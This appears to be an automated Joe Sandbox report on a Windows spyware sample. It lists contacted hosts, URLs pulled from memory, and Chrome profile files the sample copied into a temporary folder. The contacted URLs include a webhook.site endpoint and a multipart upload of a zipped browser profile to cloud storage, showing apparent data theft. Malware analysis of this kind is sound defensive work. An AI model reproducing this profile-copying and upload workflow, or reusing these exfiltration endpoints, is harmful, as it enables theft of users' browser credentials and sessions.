https://login.microsoftonline.com/Mnamespace-ff6bd74c_52d9_4769_b984_108ae96a1d99-https://support.mi	0%	Avira URL Cloud	safe
http://s3.amazonaws.com/doc/2006-03-01/https://s3.ap-southeast-1.wasabisys.com/browser-profiles/2024	0%	Avira URL Cloud	safe
http://s3.amazonaws.com/doc/2006-03-01/eyhttp://s3.amazonaws.com/doc/2006-03-01/	0%	Avira URL Cloud	safe
https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default	0%	Avira URL Cloud	safe
https://identity.nel.measure.office.net/api/report?catId=GW	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/chromewebstore	0%	Avira URL Cloud	safe
https://docs.google.com/presentation/?usp=installed_webapp	0%	Avira URL Cloud	safe
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5https://webhook.site/efe6628a-60cc-4d7a-bd0	0%	Avira URL Cloud	safe
https://docs.google.com/document/?usp=installed_webapp	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/gws/none	0%	Avira URL Cloud	safe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/202408220240829212611-71434D56-1548-ED3D-AE	0%	Avira URL Cloud	safe
https://www.google.com/	0%	Avira URL Cloud	safe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240829212611-71434D56-1548-ED3D-AEE6-C75A	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipapi.co	104.26.8.44	true	false	0%, Virustotal, Browse	unknown
ap-southeast-1.wasabisys.com	154.18.200.103	true	false	0%, Virustotal, Browse	unknown
webhook.site	46.4.105.116	true	false	0%, Virustotal, Browse	unknown
s3.ap-southeast-1.wasabisys.com	unknown	unknown	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5	false	Avira URL Cloud: safe	unknown
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240829212611-71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip?uploadId=xegBsN0h7GK8TsbYHtXU_rFF4rPC2_2LH9Yu8_BPdoDoOFvXyLT4HBqv_zXSu7-SihvUH-HBZN3kGSnHfVKG4JBLZ0rDdIuUMtS9KUOhMcJseIl8xj753Ke9waxkTXK2	false	Avira URL Cloud: safe	unknown
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240829212611-71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip?uploads=	false	Avira URL Cloud: safe	unknown
https://ipapi.co/json/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de51010101--09AZ__azhttps://webhook.site/efe66	5EvHHcMjRg.exe, 00000000.00000002.1923988098.000000000207C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	false	URL Reputation: safe	unknown
https://mail.google.com/mail/?usp=installed_webapp	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/	000003.log3.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	false	URL Reputation: safe	unknown
https://mail.google.com/mail/installwebapp?usp=chrome_default	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.google.com/presentation/J	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.google.com/document/J	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://drive.google.com/drive/installwebapp?usp=chrome_default	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://www.youtube.com/:	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
http://s3.amazonaws.com/doc/2006-03-01/	5EvHHcMjRg.exe	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	false	URL Reputation: safe	unknown
https://mail.google.com/mail/:	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002000000.00000004.00001000.00020000.00000000.sdmp, History.0.dr	false	URL Reputation: safe	unknown
https://docs.google.com/document/installwebapp?usp=chrome_default	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=en	Top Sites.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.google.com/presentation/:	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.google.com/presentation/installwebapp?usp=chrome_default	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.google.com/	Secure Preferences.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.google.com/document/:	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enWeb	Top Sites.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.google.com/spreadsheets/J	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://docs.google.com/spreadsheets/?usp=installed_webapp	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://drive-staging.corp.google.com/	Secure Preferences.0.dr	false	URL Reputation: safe	unknown
https://mail.google.com/mail/J	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	Secure Preferences.0.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	History.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	false	URL Reputation: safe	unknown
https://docs.google.com/spreadsheets/:	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://drive.google.com/?lfhs=2	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://www.youtube.com/s/notifications/manifest/cr_install.html	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de51010101	5EvHHcMjRg.exe, 00000000.00000002.1923988098.000000000207C000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002012000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.youtube.com/?feature=ytca	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://www.youtube.com/J	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://drive.google.com/:	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore	Secure Preferences.0.dr	false	Avira URL Cloud: safe	unknown
https://drive-daily-2.corp.google.com/	Secure Preferences.0.dr	false	URL Reputation: safe	unknown
https://docs.google.com/spreadsheets/installwebapp?us	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive-autopush.corp.google.com/	Secure Preferences.0.dr	false	URL Reputation: safe	unknown
https://drive-daily-4.corp.google.com/	Secure Preferences.0.dr	false	URL Reputation: safe	unknown
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de51010101-	5EvHHcMjRg.exe, 00000000.00000002.1923988098.000000000207C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://s3.amazonaws.com/doc/2006-03-01/ey	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002012000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	false	URL Reputation: safe	unknown
https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1	Tabs_13340886879273065.0.dr, Tabs_13340886963547611.0.dr	false	Avira URL Cloud: safe	unknown
https://drive.google.com/J	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002000000.00000004.00001000.00020000.00000000.sdmp, History.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	false	URL Reputation: safe	unknown
https://drive-daily-1.corp.google.com/	Secure Preferences.0.dr	false	URL Reputation: safe	unknown
https://drive-daily-5.corp.google.com/	Secure Preferences.0.dr	false	URL Reputation: safe	unknown
https://login.microsoftonline.com/savedusers?appid=ee272b19-4411-433f-8f28-5c13cb6fd407&wreply=https	Session_13340886879173047.0.dr	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	false	URL Reputation: safe	unknown
https://mem.gfx.ms/	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002306000.00000004.00001000.00020000.00000000.sdmp, 000003.log3.0.dr	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/Mnamespace-ff6bd74c_52d9_4769_b984_108ae96a1d99-https://support.mi	000003.log3.0.dr	false	Avira URL Cloud: safe	unknown
http://s3.amazonaws.com/doc/2006-03-01/https://s3.ap-southeast-1.wasabisys.com/browser-profiles/2024	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002653000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://s3.amazonaws.com/doc/2006-03-01/eyhttp://s3.amazonaws.com/doc/2006-03-01/	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002012000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://identity.nel.measure.office.net/api/report?catId=GW	Reporting and NEL.0.dr	false	Avira URL Cloud: safe	unknown
https://csp.withgoogle.com/csp/report-to/chromewebstore	Reporting and NEL.0.dr	false	Avira URL Cloud: safe	unknown
https://drive-daily-6.corp.google.com/	Secure Preferences.0.dr	false	URL Reputation: safe	unknown
https://drive-daily-0.corp.google.com/	Secure Preferences.0.dr	false	URL Reputation: safe	unknown
https://docs.google.com/presentation/?usp=installed_webapp	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5https://webhook.site/efe6628a-60cc-4d7a-bd0	5EvHHcMjRg.exe, 00000000.00000002.1923988098.000000000207C000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive-preprod.corp.google.com/	Secure Preferences.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	History.0.dr	false	URL Reputation: safe	unknown
https://docs.google.com/document/?usp=installed_webapp	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	false	URL Reputation: safe	unknown
https://csp.withgoogle.com/csp/report-to/gws/none	Reporting and NEL.0.dr	false	Avira URL Cloud: safe	unknown
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/202408220240829212611-71434D56-1548-ED3D-AE	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002653000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/	Secure Preferences.0.dr	false	Avira URL Cloud: safe	unknown
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240829212611-71434D56-1548-ED3D-AEE6-C75A	5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002678000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive-daily-3.corp.google.com/	Secure Preferences.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.8.44	ipapi.co	United States	13335	CLOUDFLARENETUS	false
46.4.105.116	webhook.site	Germany	24940	HETZNER-ASDE	false
154.18.200.103	ap-southeast-1.wasabisys.com	United States	38701	PIRANHA-AS-KRPiranhaSystemsKR	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501540
Start date and time:	2024-08-30 03:25:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	5EvHHcMjRg.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:	35005932465ca51b1bffcd168dd6c9386dbdecb78efacfbe4877b9b1e65da8b4
Detection:	MAL
Classification:	mal60.spyw.winEXE@1/116@3/3
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 5EvHHcMjRg.exe, PID 5740 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:26:00	API Interceptor	1x Sleep call for process: 5EvHHcMjRg.exe modified

Created / dropped Files

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Affiliation Database

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.40014189446483467
Encrypted:	false
SSDEEP:	24:TLz3blvGgOg53yS0lNvN2HLvKroyr0n4BmhltoVOq6Uwcc05fBGQwQ:TNxiSdLS0aVOlU1coB
MD5:	00AF4A50B4E83413600C40BE126B17B1
SHA1:	D6C2AAC58F581C4EA3B45C997A922DD99B2396CD
SHA-256:	95A77058925FC8DC392E2A4CF51D60EE41FFA49967A6E3BD4F34EFE3F0473E0E
SHA-512:	8B95EE2EFCA34EFE82A7E53E3C9EF68B481F174A5545C6A0AF9BB104AB43EF9554E2FB439522D4308886A8B04C9BC912472E82AF1E0964A5CA89906F0C646A02
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g.....e...$.y.....Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BrowsingTopicsSiteData

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.43798896343124133
Encrypted:	false
SSDEEP:	12:TLiqiQ5xT5SmKT5Si8wT5SislpXUUfzBW8ybwaW2b8wAs76uvsUkHZ6HFxOUwa52:TLiK5byqkiXBzlRr6hkc6UwccI5fBG
MD5:	7DCE97F609ECB4E2FA1F10D6594B362D
SHA1:	D78E2B7CFD27CEEBA4232752198D0561187E996A
SHA-256:	DBB0DAFF05CC9D3E3D524CE2C13913A0C7A193EF0A81254731DEF5623D2A8A31
SHA-512:	93B09E49BC25E7671471DA4002325F2EAB900B07C66F4CA142EA7A0A34009F6ACBB7C089EAE5056EAA5700F3E474205096D03DA14F4A8E3F1233647573212FAF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g.......o..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\BrowsingTopicsState

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	414
Entropy (8bit):	5.055127176389896
Encrypted:	false
SSDEEP:	12:1HAgdRN6NysV+zW1+F6sKaxVRpKh0SSBNwhRmjN6c:1H/K+y1BxaxVRpKh0pBNymB
MD5:	CFD8029509CF74094214430F6D4F5795
SHA1:	D746C42FE26C1CC068A252E9B4CE887E7D368CB5
SHA-256:	E0110A80893E9F66A9CA537C82A1367BE6E34114918FF908700CB2EB83E3FD49
SHA-512:	ADC22E2F10D8E2912403A176DC865AB2ED2851D325403A3DE684A967ADE5456FD7B6B2FC8AEBB7ACC7C4FE508172D7CB88CE3BF448D497802911FE4EE9D92E8F
Malicious:	false
Reputation:	low
Preview:	{.. "epochs": [ {.. "calculation_time": "13340807400996059",.. "config_version": 0,.. "model_version": "0",.. "padded_top_topics_start_index": 0,.. "taxonomy_version": 0,.. "top_topics_and_observing_domains": [ ].. } ],.. "hex_encoded_hmac_key": "EA1AAC8C0FCD3A358D063637E2DB9DF1368D26BD096623500D37FFCAE52D32D4",.. "next_scheduled_calculation_time": "13341412200996156"..}..

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\DIPS

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.4585310554166254
Encrypted:	false
SSDEEP:	24:TLUYFQq3qh7z3WMYziciNW9WkZ96UwOfBi23fw:T4uQq3qh7z3bY2LNW9WMcUvBVv
MD5:	53B676CC2ADAB4F0AB9F4B13974B75FD
SHA1:	94FA949BE91B71EBCD9B82F78B7EC93A46153697
SHA-256:	AF10C8AAE87D10CF1BCE8C0D94FF103F4671E5A0E480BE681B4568614F19A9B0
SHA-512:	4EEDF15B35DD825BF21A8AA64F349A7B4C542BDF993D4ED260B38614D8841A070001B51415F464D6DDBEC81D986D697F3D022FAFD0BE64BB967F319D3E719E03
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Cookies

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\000003.log

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	data
Category:	dropped
Size (bytes):	152
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCT
MD5:	5649E96DCAC327DDE1B450B1C06A27D3
SHA1:	7AA5F9FB94F95F5977AE9BFA7A4957724FD66F19
SHA-256:	FBCBAF8740CB027FF6A147C013B6745071CF2A1FDE4450AB2A7A04FBC401F0C9
SHA-512:	0BF8D7E6582330D8C362C85EE0688F2A38D3768ECD6DDB9277EFFAA718B2B6C7FD82F665CECCEFD164C2921FE4EB30C43DFB7A3AB3A8FA4496E5B8F3F8DF10C3
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\CURRENT

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\LOG

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	279
Entropy (8bit):	5.19908769704448
Encrypted:	false
SSDEEP:	6:k9JFD1wkn23iKKdK8aVdg2KLliuIq2Pwkn23iKKdK8aPrqIFUv:k9Lyf5Kk0LknvYf5KkL3FUv
MD5:	986E4C0A7A3DDD09C579064ED017D3BB
SHA1:	26733B74181C52C0443B4134C130FC5C82C13C73
SHA-256:	D39AF202300F93FDC4B4EE76C60E801C48C105A45B679232C947808729C6E0E2
SHA-512:	01981F60477E1BE48E152A74EE9977B66FFF27FB97EC1CAC18DEC8C196E65B21805AA7D61BB85A20A70E37B41330433D13629975F32A1F3A62EDC43249A40928
Malicious:	false
Preview:	2023/10/03-12:49:58.315 1370 Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules since it was missing..2023/10/03-12:49:58.332 1370 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Rules\MANIFEST-000001

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\000003.log

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	data
Category:	dropped
Size (bytes):	152
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCT
MD5:	5649E96DCAC327DDE1B450B1C06A27D3
SHA1:	7AA5F9FB94F95F5977AE9BFA7A4957724FD66F19
SHA-256:	FBCBAF8740CB027FF6A147C013B6745071CF2A1FDE4450AB2A7A04FBC401F0C9
SHA-512:	0BF8D7E6582330D8C362C85EE0688F2A38D3768ECD6DDB9277EFFAA718B2B6C7FD82F665CECCEFD164C2921FE4EB30C43DFB7A3AB3A8FA4496E5B8F3F8DF10C3
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Extension Scripts\CURRENT

Download File

Process:	C:\Users\user\Desktop\5EvHHcMjRg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
